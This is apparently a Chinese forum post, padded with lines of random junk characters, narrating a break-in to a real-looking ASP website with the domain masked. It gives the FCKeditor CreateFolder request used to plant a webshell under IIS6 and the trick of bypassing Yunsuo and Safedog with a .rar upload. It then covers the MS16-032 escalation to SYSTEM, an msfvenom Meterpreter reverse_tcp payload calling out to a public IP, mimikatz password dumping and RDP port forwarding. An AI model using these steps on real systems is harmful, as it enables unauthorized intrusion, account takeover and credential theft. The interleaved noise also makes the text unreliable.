+ t7 w% S1 S. U" i" Y; ^) N* Z
; X1 o9 @7 R6 s5 t1 g+ s& o 8 }4 p0 ?" s2 E$ }, P3 H6 k1 l
9 J3 x+ N$ g# d1 N8 W 1 c/ u: A7 R2 X' w A
" a# Q8 M( H$ b6 i
" R. P5 O. V, i- |6 m一、 利用getwebshell篇
6 k+ Y0 Q6 Q9 m ! H2 R# S! X3 d' N5 S
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: ) Q& ]* }& |/ [1 }, r: W9 k& M4 e# _
6 x3 {6 w$ }! J- a + {& D+ H8 u) ?$ _! {4 e
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
6 J# i- f( |+ m" { 4 K0 r% d e6 n" |( W( G4 A) |
下面我们构造一个asp目录,如: S5 r$ O! P8 ?/ `
( \3 {. g! `$ q
: }6 f+ X% Z( X9 D" d http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
& t& X% _; B* B8 z1 j 3 K* f; M6 f1 e0 S) H
2 L5 x) ?( N6 q% u: A 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 0 \+ v0 @* P/ O( I _0 A
8 y$ B0 l; b0 x4 }% c
一、 绕过安全狗云锁提权并且加账号 # j6 k4 G1 a3 `% F; ?5 M9 p2 Q6 z
# y, l' H, C5 G* b. M$ y4 Q, o0 o没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
" L. G' K( l2 y& q" Z0 o7 o: h5 H 5 F: ~- j S1 |+ R. X& Q' z
如图:
. O$ Y( ?7 ]3 l# n7 n. D1 Z4 p3 U
1 R$ q9 L: V% v8 Y x然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit 0 [9 Z }% d5 H+ K* t5 z7 j
' n. j* P O6 X
一、 利用metasploit
( v) N7 E9 {' R2 T8 V / L3 }/ P' t) V5 A" S% Z& U
首先用pentestbox生成一个64位的payload如下命令 / |6 c4 ], [3 V7 e. {) X
4 t# j9 {/ f# r7 `6 ]( gmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
# G/ b4 X0 m) q& N+ x8 w
- A+ @ x, Y6 i4 `8 z为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: $ w( y' _5 i( k, U/ g
, i& p( V$ X4 m& G6 A- h下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
+ k( t6 z/ `% Z' h
0 x; m, |4 E/ i) V5 y6 o下面我们来做一个监听如下命令:
& Q1 P' F7 z4 ^: E) c - x* ?; V7 G6 t: \; S
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
- r) T" L# i4 m6 ?# w2 b7 Y# r* z$ ~
- ]6 N8 q7 x- ]' t9 O
% M( E( I) y7 X. ?( w! O9 c |
8 T9 h0 ~+ Q& A9 @- V& D& g. x: l
3 A/ T& _' |: {2 `) ] : {$ Y1 \, G) T' L" y9 ]
4 b Q _+ L7 L, P; P
" G9 {+ w' J0 Z. \* l
1 C+ S! o+ d9 y! a5 L) L# }: I + v+ }3 s) ], a/ O* R% ^
3 @6 m% k; W7 n$ i; a0 g* x- f, } 3 @9 ^$ I u7 z" v; r
7 U& K1 |7 ]0 H$ K" j/ u
3 Z0 C# o z; U# e
& L* Q; [- \4 S% p Z: L) e
, ~# Z; G0 C, u1 S
; z `4 e H9 s8 O+ l. A& D! P/ @ |